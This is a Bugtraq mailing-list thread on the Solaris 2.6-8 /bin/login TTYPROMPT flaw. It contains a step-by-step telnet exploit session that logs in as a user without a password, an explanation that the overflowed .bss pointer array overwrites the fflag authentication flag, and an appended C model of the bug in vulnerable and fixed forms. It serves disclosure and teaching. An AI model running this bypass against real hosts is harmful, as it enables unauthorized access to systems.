Bugtraq mailing list archives
RE: Solaris 2.6, 7, 8
From: "Sinan Eren" <SEren () entercept com>
Date: Wed, 2 Oct 2002 13:04:27 -0700
The problem is that there exists an authentication flag called the "fflag" just after the array that gets overflowed in the .bss segment. This is an array of char pointers, so when it is overflowed because of a mismanagement of the indexing of this array, the fflag gets overwritten with a valid address in the .bss segment. This is good enough to satisfy the if(fflag) condition and spawn a shell.

Some truth about this finding: there has been an exploit out in the wild for some time, and the example pattern shown by Jonathan is exactly the same as the payload of that exploit. So I'm curious about this finding's origin; I think credit must be given where due... I'll be waiting for a clarification from Mr. Stuart.

thanks,
sinan

-----Original Message-----
From: Jonathan S [mailto:js () APOLLO GTI NET]
Sent: Wednesday, October 02, 2002 9:13 AM
To: bugtraq () securityfocus com
Subject: Solaris 2.6, 7, 8

Hello,

Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists.

The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example:

    coma% telnet
    telnet> environ define TTYPROMPT abcdef
    telnet> o localhost
    SunOS 5.8

    bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    Last login: whenever
    $ whoami
    bin

Jonathan Stuart
Network Security Engineer
Computer Consulting Partners, Ltd.
E-mail: jons () ccpartnersltd com
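The following is an added illustration, not code from either post and not the Solaris /bin/login source: a small C model of the bug class Sinan describes, a zero-initialised (.bss) array of char pointers with the authentication flag placed directly after it, filled by a tokenizer whose index is never bounded. The array size of 64, the struct layout, the name login_state, and all function names are assumptions made for the example; only the mechanism (the 65th token pointer landing on the flag, so that if(fflag) passes) follows the thread. The hardened variant differs only by the bounds check.

```c
/* Added example (not from the Bugtraq posts): model of the overflowed
 * pointer array in .bss with the "fflag" authentication flag behind it.
 * ARGS_MAX, the struct layout and the function names are assumptions. */
#include <stdio.h>
#include <string.h>

#define ARGS_MAX     64      /* assumed size of the pointer array */
#define LINE_MAX_LEN 1024

struct login_state {
    char *args[ARGS_MAX];    /* tokens of the line typed at the prompt */
    volatile int fflag;      /* "already authenticated" flag, adjacent in .bss */
};

static struct login_state state;     /* static, zero-initialised: lives in .bss */
static char linebuf[LINE_MAX_LEN];   /* also .bss, so every token pointer is a
                                        valid, non-zero .bss address */

/* Split the typed line on spaces into state.args. The vulnerable build never
 * checks the index, so the 65th token pointer is stored on top of fflag. */
__attribute__((noinline))
static void tokenize(const char *line, int bounded)
{
    memset(&state, 0, sizeof state);
    strncpy(linebuf, line, sizeof linebuf - 1);
    linebuf[sizeof linebuf - 1] = '\0';

    int n = 0;
    for (char *tok = strtok(linebuf, " "); tok; tok = strtok(NULL, " ")) {
        if (bounded && n >= ARGS_MAX)
            break;                   /* the fix: stop at the end of the array */
        state.args[n++] = tok;       /* unbounded store in the vulnerable build */
    }
}

/* Returns 1 if the session gets a shell. password_ok models whether the
 * caller could have supplied the real password (0 = it could not). */
static int login_attempt(const char *line, int password_ok, int bounded)
{
    tokenize(line, bounded);
    if (!state.args[0])              /* empty line: nothing to log in as */
        return 0;
    if (state.fflag)                 /* the check the overwritten flag satisfies */
        return 1;
    return password_ok;
}

int login_vulnerable(const char *line, int password_ok)
{
    return login_attempt(line, password_ok, 0);
}

int login_fixed(const char *line, int password_ok)
{
    return login_attempt(line, password_ok, 1);
}

/* Build "<user>" followed by ncs copies of " c", the pattern typed in the post. */
void build_line(char *out, size_t cap, const char *user, int ncs)
{
    snprintf(out, cap, "%s", user);
    for (int i = 0; i < ncs && strlen(out) + 3 <= cap; i++)
        strcat(out, " c");
}

/* Convenience wrapper: attempt a login with <user> plus ncs " c" tokens. */
int attempt_with_cs(const char *user, int ncs, int password_ok, int bounded)
{
    char line[LINE_MAX_LEN];
    build_line(line, sizeof line, user, ncs);
    return login_attempt(line, password_ok, bounded);
}

int main(void)
{
    /* 65 tokens: "bin" + 64 " c" -> args[64] overwrites fflag in the vulnerable build */
    printf("vulnerable, 64 c's, no password: %d\n", attempt_with_cs("bin", 64, 0, 0));
    printf("fixed,      64 c's, no password: %d\n", attempt_with_cs("bin", 64, 0, 1));
    /* 64 tokens fit exactly; fflag is untouched and the password decides */
    printf("vulnerable, 63 c's, no password: %d\n", attempt_with_cs("bin", 63, 0, 0));
    return 0;
}
```

The token count is what matters: with the assumed 64-entry array, 63 " c"s after the username fill it exactly and the flag stays zero, while the 64th " c" of the posted session is the one whose pointer lands on fflag. The flag never needs a specific value, only a non-zero one, which is why any .bss address suffices, as the reply points out.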